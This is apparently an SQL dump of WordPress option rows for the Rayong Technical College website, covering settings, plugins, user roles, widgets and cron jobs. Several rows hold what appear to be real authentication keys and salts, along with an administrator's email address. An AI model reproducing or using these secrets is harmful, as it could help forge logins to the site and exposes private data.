(1, 'siteurl', 'http://www.technicrayong.ac.th', 'yes'),
(2, 'home', 'http://www.technicrayong.ac.th', 'yes'),
(3, 'blogname', 'วิทยาลัยเทคนิคระยอง', 'yes'),
(4, 'blogdescription', 'Rayong Technical College', 'yes'),
(5, 'users_can_register', '0', 'yes'),
(6, 'admin_email', 'prinya.c@technicrayong.ac.th', 'yes'),
(7, 'start_of_week', '1', 'yes'),
(8, 'use_balanceTags', '0', 'yes'),
(9, 'use_smilies', '1', 'yes'),
(10, 'require_name_email', '1', 'yes'),
(11, 'comments_notify', '1', 'yes'),
(12, 'posts_per_rss', '10', 'yes'),
(13, 'rss_use_excerpt', '1', 'yes'),
(14, 'mailserver_url', 'mail.example.com', 'yes'),
(15, 'mailserver_login', 'login@example.com', 'yes'),
(16, 'mailserver_pass', 'password', 'yes'),
(17, 'mailserver_port', '110', 'yes'),
(18, 'default_category', '19', 'yes'),
(19, 'default_comment_status', 'closed', 'yes'),
(20, 'default_ping_status', 'open', 'yes'),
(21, 'default_pingback_flag', '1', 'yes'),
(22, 'posts_per_page', '10', 'yes'),
(23, 'date_format', 'd/m/Y', 'yes'),
(24, 'time_format', 'g:i a', 'yes'),
(25, 'links_updated_date_format', 'F j, Y g:i a', 'yes'),
(26, 'comment_moderation', '', 'yes'),
(27, 'moderation_notify', '1', 'yes'),
(28, 'permalink_structure', '/%postname%/', 'yes'),
(30, 'hack_file', '0', 'yes'),
(31, 'blog_charset', 'UTF-8', 'yes'),
(32, 'moderation_keys', '', 'no'),
(33, 'active_plugins', 'a:11:{i:0;s:21:\"polylang/polylang.php\";i:1;s:37:\"breadcrumb-navxt/breadcrumb-navxt.php\";i:2;s:29:\"hide-featured-image/index.php\";i:3;s:19:\"members/members.php\";i:4;s:23:\"ml-slider/ml-slider.php\";i:5;s:39:\"pdfjs-viewer-shortcode/pdfjs-viewer.php\";i:6;s:27:\"popup-maker/popup-maker.php\";i:7;s:37:\"post-types-order/post-types-order.php\";i:8;s:29:\"relative-url/relative-url.php\";i:9;s:25:\"tablepress/tablepress.php\";i:10;s:47:\"wp-media-manager-lite/wp-media-manager-lite.php\";}', 'yes'),
(34, 'category_base', '', 'yes'),
(35, 'ping_sites', 'http://rpc.pingomatic.com/', 'yes'),
(36, 'comment_max_links', '2', 'yes'),
(37, 'gmt_offset', '7', 'yes'),
(38, 'default_email_category', '1', 'yes'),
(39, 'recently_edited', 'a:5:{i:0;s:111:\"/home/technicray/domains/technicrayong.ac.th/public_html/wp-content/plugins/acme-demo-setup/acme-demo-setup.php\";i:1;s:110:\"/home/technicray/domains/technicrayong.ac.th/public_html/wp-content/plugins/multiple-domain/MultipleDomain.php\";i:2;s:118:\"/home/technicray/domains/technicrayong.ac.th/public_html/wp-content/plugins/multiple-domain/MultipleDomainSettings.php\";i:3;s:111:\"/home/technicray/domains/technicrayong.ac.th/public_html/wp-content/plugins/multiple-domain/multiple-domain.php\";i:4;s:102:\"/home/technicray/domains/technicrayong.ac.th/public_html/wp-content/plugins/multiple-domain/readme.txt\";}', 'no'),
(40, 'template', 'university-hub-pro', 'yes'),
(41, 'stylesheet', 'university-hub-pro', 'yes'),
(42, 'comment_whitelist', '1', 'yes'),
(43, 'blacklist_keys', '', 'no'),
(44, 'comment_registration', '', 'yes'),
(45, 'html_type', 'text/html', 'yes'),
(46, 'use_trackback', '0', 'yes'),
(47, 'default_role', 'subscriber', 'yes'),
(48, 'db_version', '38590', 'yes'),
(49, 'uploads_use_yearmonth_folders', '1', 'yes'),
(50, 'upload_path', '', 'yes'),
(51, 'blog_public', '1', 'yes'),
(52, 'default_link_category', '2', 'yes'),
(53, 'show_on_front', 'page', 'yes'),
(54, 'tag_base', '', 'yes'),
(55, 'show_avatars', '1', 'yes'),
(56, 'avatar_rating', 'G', 'yes'),
(57, 'upload_url_path', '', 'yes'),
(58, 'thumbnail_size_w', '150', 'yes'),
(59, 'thumbnail_size_h', '150', 'yes'),
(60, 'thumbnail_crop', '1', 'yes'),
(61, 'medium_size_w', '300', 'yes'),
(62, 'medium_size_h', '300', 'yes'),
(63, 'avatar_default', 'mystery', 'yes'),
(64, 'large_size_w', '1024', 'yes'),
(65, 'large_size_h', '1024', 'yes'),
(66, 'image_default_link_type', 'none', 'yes'),
(67, 'image_default_size', '', 'yes'),
(68, 'image_default_align', '', 'yes'),
(69, 'close_comments_for_old_posts', '', 'yes'),
(70, 'close_comments_days_old', '14', 'yes'),
(71, 'thread_comments', '1', 'yes'),
(72, 'thread_comments_depth', '5', 'yes'),
(73, 'page_comments', '', 'yes'),
(74, 'comments_per_page', '50', 'yes'),
(75, 'default_comments_page', 'newest', 'yes'),
(76, 'comment_order', 'asc', 'yes'),
(77, 'sticky_posts', 'a:0:{}', 'yes'),
(78, 'widget_categories', 'a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(79, 'widget_text', 'a:3:{i:1;a:0:{}i:5;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:342:\"<a href=\"/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%ad%e0%b8%a7%e0%b8%97-%e0%b8%a7%e0%b8%97-%e0%b8%a3%e0%b8%a2/\"><img class=\"aligncenter wp-image-4277 size-large\" src=\"/wp-content/uploads/2018/11/AVT-Banner-1024x190.png\" alt=\"\" width=\"640\" height=\"119\" /></a>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;s:10:\"conditions\";a:3:{s:6:\"action\";s:4:\"show\";s:9:\"match_all\";s:1:\"0\";s:5:\"rules\";a:1:{i:0;a:3:{s:5:\"major\";s:4:\"page\";s:5:\"minor\";s:5:\"front\";s:12:\"has_children\";b:0;}}}}s:12:\"_multiwidget\";i:1;}', 'yes'),
(80, 'widget_rss', 'a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}', 'yes'),
(81, 'uninstall_plugins', 'a:1:{s:37:\"optinmonster/optin-monster-wp-api.php\";s:32:\"optin_monster_api_uninstall_hook\";}', 'no'),
(82, 'timezone_string', '', 'yes'),
(83, 'page_for_posts', '0', 'yes'),
(84, 'page_on_front', '160', 'yes'),
(85, 'default_post_format', '0', 'yes'),
(86, 'link_manager_enabled', '0', 'yes'),
(87, 'finished_splitting_shared_terms', '1', 'yes'),
(88, 'site_icon', '0', 'yes'),
(89, 'medium_large_size_w', '768', 'yes'),
(90, 'medium_large_size_h', '0', 'yes'),
(91, 'initial_db_version', '38590', 'yes'),
(92, 'wp_user_roles', 'a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:119:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:8:\"read_cta\";b:1;s:17:\"read_private_ctas\";b:1;s:8:\"edit_cta\";b:1;s:9:\"edit_ctas\";b:1;s:16:\"edit_others_ctas\";b:1;s:19:\"edit_published_ctas\";b:1;s:12:\"publish_ctas\";b:1;s:18:\"delete_others_ctas\";b:1;s:19:\"delete_private_ctas\";b:1;s:21:\"delete_published_ctas\";b:1;s:9:\"read_lead\";b:1;s:18:\"read_private_leads\";b:1;s:9:\"edit_lead\";b:1;s:10:\"edit_leads\";b:1;s:17:\"edit_others_leads\";b:1;s:20:\"edit_published_leads\";b:1;s:13:\"publish_leads\";b:1;s:12:\"delete_leads\";b:1;s:19:\"delete_others_leads\";b:1;s:20:\"delete_private_leads\";b:1;s:22:\"delete_published_leads\";b:1;s:17:\"read_inbound-form\";b:1;s:26:\"read_private_inbound-forms\";b:1;s:17:\"edit_inbound-form\";b:1;s:18:\"edit_inbound-forms\";b:1;s:25:\"edit_others_inbound-forms\";b:1;s:28:\"edit_published_inbound-forms\";b:1;s:20:\"publish_inbound-form\";b:1;s:19:\"delete_inbound-form\";b:1;s:20:\"delete_inbound-forms\";b:1;s:27:\"delete_others_inbound-forms\";b:1;s:28:\"delete_private_inbound-forms\";b:1;s:30:\"delete_published_inbound-forms\";b:1;s:7:\"nextend\";b:1;s:14:\"nextend_config\";b:1;s:19:\"nextend_visual_edit\";b:1;s:21:\"nextend_visual_delete\";b:1;s:11:\"smartslider\";b:1;s:18:\"smartslider_config\";b:1;s:16:\"smartslider_edit\";b:1;s:18:\"smartslider_delete\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:29:\"tablepress_import_tables_wptr\";b:1;s:23:\"tablepress_edit_options\";b:1;s:20:\"wpseo_manage_options\";b:1;s:16:\"restrict_content\";b:1;s:10:\"list_roles\";b:1;s:12:\"create_roles\";b:1;s:12:\"delete_roles\";b:1;s:10:\"edit_roles\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:63:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:9:\"read_lead\";b:1;s:18:\"read_private_leads\";b:1;s:9:\"edit_lead\";b:1;s:10:\"edit_leads\";b:1;s:17:\"edit_others_leads\";b:1;s:20:\"edit_published_leads\";b:1;s:13:\"publish_leads\";b:1;s:12:\"delete_leads\";b:1;s:19:\"delete_others_leads\";b:1;s:20:\"delete_private_leads\";b:1;s:22:\"delete_published_leads\";b:1;s:7:\"nextend\";b:1;s:14:\"nextend_config\";b:1;s:19:\"nextend_visual_edit\";b:1;s:21:\"nextend_visual_delete\";b:1;s:11:\"smartslider\";b:1;s:18:\"smartslider_config\";b:1;s:16:\"smartslider_edit\";b:1;s:18:\"smartslider_delete\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:19:\"delete_others_pages\";b:0;s:19:\"delete_others_posts\";b:0;s:17:\"edit_others_pages\";b:0;s:17:\"edit_others_posts\";b:0;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:19:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:65:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:9:\"read_lead\";b:1;s:18:\"read_private_leads\";b:1;s:9:\"edit_lead\";b:1;s:10:\"edit_leads\";b:1;s:17:\"edit_others_leads\";b:1;s:20:\"edit_published_leads\";b:1;s:13:\"publish_leads\";b:1;s:12:\"delete_leads\";b:1;s:19:\"delete_others_leads\";b:1;s:20:\"delete_private_leads\";b:1;s:22:\"delete_published_leads\";b:1;s:7:\"nextend\";b:1;s:14:\"nextend_config\";b:1;s:19:\"nextend_visual_edit\";b:1;s:21:\"nextend_visual_delete\";b:1;s:11:\"smartslider\";b:1;s:18:\"smartslider_config\";b:1;s:16:\"smartslider_edit\";b:1;s:18:\"smartslider_delete\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:64:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:9:\"read_lead\";b:1;s:18:\"read_private_leads\";b:1;s:9:\"edit_lead\";b:1;s:10:\"edit_leads\";b:1;s:17:\"edit_others_leads\";b:1;s:20:\"edit_published_leads\";b:1;s:13:\"publish_leads\";b:1;s:12:\"delete_leads\";b:1;s:19:\"delete_others_leads\";b:1;s:20:\"delete_private_leads\";b:1;s:22:\"delete_published_leads\";b:1;s:7:\"nextend\";b:1;s:14:\"nextend_config\";b:1;s:19:\"nextend_visual_edit\";b:1;s:21:\"nextend_visual_delete\";b:1;s:11:\"smartslider\";b:1;s:18:\"smartslider_config\";b:1;s:16:\"smartslider_edit\";b:1;s:18:\"smartslider_delete\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}', 'yes'),
(93, 'fresh_site', '0', 'yes'),
(94, 'widget_search', 'a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(95, 'widget_recent-posts', 'a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(96, 'widget_recent-comments', 'a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(97, 'widget_archives', 'a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(98, 'widget_meta', 'a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(99, 'sidebars_widgets', 'a:13:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:6:\"meta-2\";i:5;s:12:\"categories-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:13:\"custom_html-2\";}s:9:\"sidebar-2\";a:0:{}s:30:\"sidebar-front-page-widget-area\";a:1:{i:0;s:13:\"custom_html-3\";}s:15:\"extra-sidebar-1\";a:0:{}s:15:\"extra-sidebar-2\";a:0:{}s:15:\"extra-sidebar-3\";a:0:{}s:15:\"extra-sidebar-4\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:1:{i:0;s:6:\"text-5\";}s:13:\"array_version\";i:3;}', 'yes'),
(100, 'widget_pages', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(101, 'widget_calendar', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(102, 'widget_media_audio', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(103, 'widget_media_image', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(104, 'widget_media_video', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(105, 'widget_tag_cloud', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(106, 'widget_nav_menu', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(107, 'widget_custom_html', 'a:3:{i:2;a:2:{s:5:\"title\";s:565:\"LIVE R-Radio Network พิธีเปิดแบบองค์การ อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ 29 ประจำปีการศึกษา 2560 วันที่ 9 มกราคม 2561 ณ ห้องประชุมเทพราช โรงแรมซันธารา เวสเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา 09.00 น. เป็นต้นไป\";s:7:\"content\";s:363:\"<!--\r\n<center>\r\n<iframe src=\"http://www.r-radionetwork.com/website/station/iframe/129/0\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"360\"></iframe>\r\n</center>\r\n-->\r\n\r\n<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"400\"></iframe>\r\n</center>\";}i:3;a:2:{s:5:\"title\";s:15:\"R-Radio Network\";s:7:\"content\";s:219:\"<p style=\"text-align: center;\"><iframe style=\"width: 640px; height: 360px;\" src=\"http://www.netthailand.com/hlsplayer/rayong101.php\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></p>\r\n \";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(108, 'cron', 'a:14:{i:1651369637;a:1:{s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1651369653;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1651369656;a:1:{s:20:\"jetpack_v2_heartbeat\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651393888;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651394010;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651394797;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1651396395;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651397897;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651419216;a:1:{s:26:\"pum_daily_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651423082;a:1:{s:24:\"jp_purge_transients_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651425423;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651429081;a:1:{s:30:\"popmake_daily_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1651505616;a:1:{s:27:\"pum_weekly_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}', 'yes'),
(109, 'nonce_key', '7.Mn8:85<)qJy/Am*CSpQPVc]# oCR3^fMZ$0H[ng;Czs+Ce5KE8R)/<?jfU3.K/', 'no'),
(110, 'nonce_salt', '|^,.V!lad~dMJo <O.pYsz`eyvpV1JMl-G19veiR:RWH[TJQ@Ydj_;q;&>QYq&a6', 'no'),
(111, 'theme_mods_twentyseventeen', 'a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1511190237;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}', 'yes'),
(124, 'auto_core_update_notified', 'a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:28:\"prinya.c@technicrayong.ac.th\";s:7:\"version\";s:6:\"4.9.13\";s:9:\"timestamp\";i:1576226816;}', 'no'),
(125, 'auth_key', '}`=h!WI<klsQ0>KQ0UmheC!X&JF[k>6<vvJ3@K&e`|)49|A$%>Aiw;}~%qfH?+RE', 'no'),
(126, 'auth_salt', 'K (51gFQ6--G]U?q;;IS=dg<xoMJ~_|Z;s|B~=/3u5ZGUqy(SI|xgftB{)jeDkmo', 'no'),
(127, 'logged_in_key', '>HKg1b^mRc PVd]eGIAxQ^G/qj$N;X]N`@3!xM*W!d5#}t{74H#m@<5R[yarJyRQ', 'no'),
(128, 'logged_in_salt', 'H[SrsZK[CK)EOKE^sMsd9PHO6R/3mOlCw^~}?o^zfNqHlNZUvU+cx `xo!sO#~o|', 'no'),
(132, 'can_compress_scripts', '0', 'no'),
(151, 'recently_activated', 'a:0:{}', 'yes'),
(172, 'WPLANG', '', 'yes'),
(833, 'widget_media_gallery', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(850, 'current_theme', 'University Hub Pro', 'yes'),
